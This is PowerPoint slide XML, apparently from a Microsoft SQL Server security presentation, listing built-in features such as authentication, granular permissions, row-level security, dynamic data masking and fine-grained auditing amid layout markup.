            <a:ext cx="5262882" cy="2166053"/>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Inventory personal data in database systems</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Review access model, understand the attack surface area</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Track data flows and map data lineage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A92F3865-9547-4E85-BE13-2771E9995C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077" y="4382105"/>
            <a:ext cx="5473352" cy="2137373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B051E4AF-A680-4A54-A37A-CDF50C1330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4767" y="4391824"/>
            <a:ext cx="5443982" cy="2195965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{563932B7-EC3B-4EF1-86E1-B619ABC003A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8533436" y="1113565"/>
            <a:ext cx="1716429" cy="56116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Technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B251BFC-EF1A-42A6-94B8-3267C0658BF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951151" y="1113565"/>
            <a:ext cx="1245915" cy="56116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Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17831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74638" y="1119124"/>
            <a:ext cx="11513657" cy="1336164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="179259" tIns="143407" rIns="179259" bIns="143407"/>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL Server provides enterprise-grade security capabilities on Windows and on Linux. All built in.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flowchart: Magnetic Disk 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2054599" y="3617654"/>
            <a:ext cx="904360" cy="1080702"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk">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765" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Donut 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1344503" y="2992543"/>
            <a:ext cx="2323745" cy="2323745"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd name="adj" fmla="val 149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 name="Donut 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="970128" y="2616066"/>
            <a:ext cx="3073341" cy="3073341"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd name="adj" fmla="val 10092"/>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 name="Donut 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="587104" y="2231380"/>
            <a:ext cx="3839390" cy="3839390"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd name="adj" fmla="val 7887"/>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 name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976183" y="3937622"/>
            <a:ext cx="5798062" cy="1738938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049"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Control </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="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a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="120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ccess </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Database access       	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL Server Authentication</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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chemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>			Active Directory authentication</a:t>
            </a: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Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Granular permissions</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application access    	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Row-Level Security</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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chemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                                 	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Dynamic data masking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2957227">
            <a:off x="4053458" y="3830654"/>
            <a:ext cx="1015067" cy="987571"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6571488"/>
              <a:gd name="connsiteY0" fmla="*/ 97536 h 97536"/>
              <a:gd name="connsiteX1" fmla="*/ 792480 w 6571488"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 97536"/>
              <a:gd name="connsiteX2" fmla="*/ 6571488 w 6571488"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 97536"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6498336"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 219456"/>
              <a:gd name="connsiteX1" fmla="*/ 719328 w 6498336"/>
              <a:gd name="connsiteY1" fmla="*/ 219456 h 219456"/>
              <a:gd name="connsiteX2" fmla="*/ 6498336 w 6498336"/>
              <a:gd name="connsiteY2" fmla="*/ 219456 h 219456"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6938476"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 219456"/>
              <a:gd name="connsiteX1" fmla="*/ 719328 w 6938476"/>
              <a:gd name="connsiteY1" fmla="*/ 219456 h 219456"/>
              <a:gd name="connsiteX2" fmla="*/ 6938476 w 6938476"/>
              <a:gd name="connsiteY2" fmla="*/ 219456 h 219456"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 7008815"/>
              <a:gd name="connsiteY0" fmla="*/ 1608 h 1608"/>
              <a:gd name="connsiteX1" fmla="*/ 789667 w 7008815"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1608"/>
              <a:gd name="connsiteX2" fmla="*/ 7008815 w 7008815"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1608"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 11649"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 11649 w 11649"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 11665"/>
              <a:gd name="connsiteY0" fmla="*/ 2500 h 2500"/>
              <a:gd name="connsiteX1" fmla="*/ 11665 w 11665"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2500"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9854"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 9854 w 9854"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9854" h="10000">
                <a:moveTo>
                  <a:pt x="0" y="10000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9854" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="90000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="oval"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14" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4988551" y="3979709"/>
            <a:ext cx="718646" cy="718646"/>
            <a:chOff x="10406831" y="3248240"/>
            <a:chExt cx="718850" cy="718850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Oval 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10406831" y="3248240"/>
              <a:ext cx="718850" cy="718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6" name="Freeform 164"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="10609440" y="3392641"/>
              <a:ext cx="313625" cy="434812"/>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2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="83919" tIns="41960" rIns="83919" bIns="41960" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932201" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1630" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Freeform 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3741769" y="5483042"/>
            <a:ext cx="1624194" cy="505406"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 6120384 w 6120384"/>
              <a:gd name="connsiteY0" fmla="*/ 548640 h 548640"/>
              <a:gd name="connsiteX1" fmla="*/ 548640 w 6120384"/>
              <a:gd name="connsiteY1" fmla="*/ 548640 h 548640"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 6120384"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 548640"/>
              <a:gd name="connsiteX0" fmla="*/ 6666295 w 6666295"/>
              <a:gd name="connsiteY0" fmla="*/ 541816 h 548640"/>
              <a:gd name="connsiteX1" fmla="*/ 548640 w 6666295"/>
              <a:gd name="connsiteY1" fmla="*/ 548640 h 548640"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 6666295"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 548640"/>
              <a:gd name="connsiteX0" fmla="*/ 6666295 w 6666295"/>
              <a:gd name="connsiteY0" fmla="*/ 541816 h 541816"/>
              <a:gd name="connsiteX1" fmla="*/ 448156 w 6666295"/>
              <a:gd name="connsiteY1" fmla="*/ 518495 h 541816"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 6666295"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 541816"/>
              <a:gd name="connsiteX0" fmla="*/ 6666295 w 6666295"/>
              <a:gd name="connsiteY0" fmla="*/ 541816 h 568737"/>
              <a:gd name="connsiteX1" fmla="*/ 458205 w 6666295"/>
              <a:gd name="connsiteY1" fmla="*/ 568737 h 568737"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 6666295"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 568737"/>
              <a:gd name="connsiteX0" fmla="*/ 5907881 w 5907881"/>
              <a:gd name="connsiteY0" fmla="*/ 552574 h 568737"/>
              <a:gd name="connsiteX1" fmla="*/ 458205 w 5907881"/>
              <a:gd name="connsiteY1" fmla="*/ 568737 h 568737"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 5907881"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 568737"/>
              <a:gd name="connsiteX0" fmla="*/ 5987891 w 5987891"/>
              <a:gd name="connsiteY0" fmla="*/ 552574 h 568737"/>
              <a:gd name="connsiteX1" fmla="*/ 458205 w 5987891"/>
              <a:gd name="connsiteY1" fmla="*/ 568737 h 568737"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 5987891"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 568737"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5987891" h="568737">
                <a:moveTo>
                  <a:pt x="5987891" y="552574"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="458205" y="568737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="90000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="oval"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18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5977601" y="5633841"/>
            <a:ext cx="4528484" cy="784830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="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Monitor access</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="120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endParaRP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Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Tracking activities          	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fine-grained audit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4949023" y="5635938"/>
            <a:ext cx="718646" cy="718646"/>
            <a:chOff x="10227128" y="4370157"/>
            <a:chExt cx="718850" cy="718850"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Oval 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10227128" y="4370157"/>
              <a:ext cx="718850" cy="718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21" name="Group 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="black">
            <a:xfrm>
              <a:off x="10364274" y="4548749"/>
              <a:ext cx="444565" cy="361673"/>
              <a:chOff x="5184775" y="225425"/>
              <a:chExt cx="1500188" cy="1220788"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22"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tx1"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr vert="horz" wrap="square" lIns="93233" tIns="46616" rIns="93233" bIns="46616" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932201" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr kumimoji="0" lang="en-US" sz="163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3" name="Oval 87"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="5630863" y="812800"/>
                <a:ext cx="203200" cy="203200"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr vert="horz" wrap="square" lIns="93233" tIns="46616" rIns="93233" bIns="46616" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932201" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr kumimoji="0" lang="en-US" sz="163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4"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tx1"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
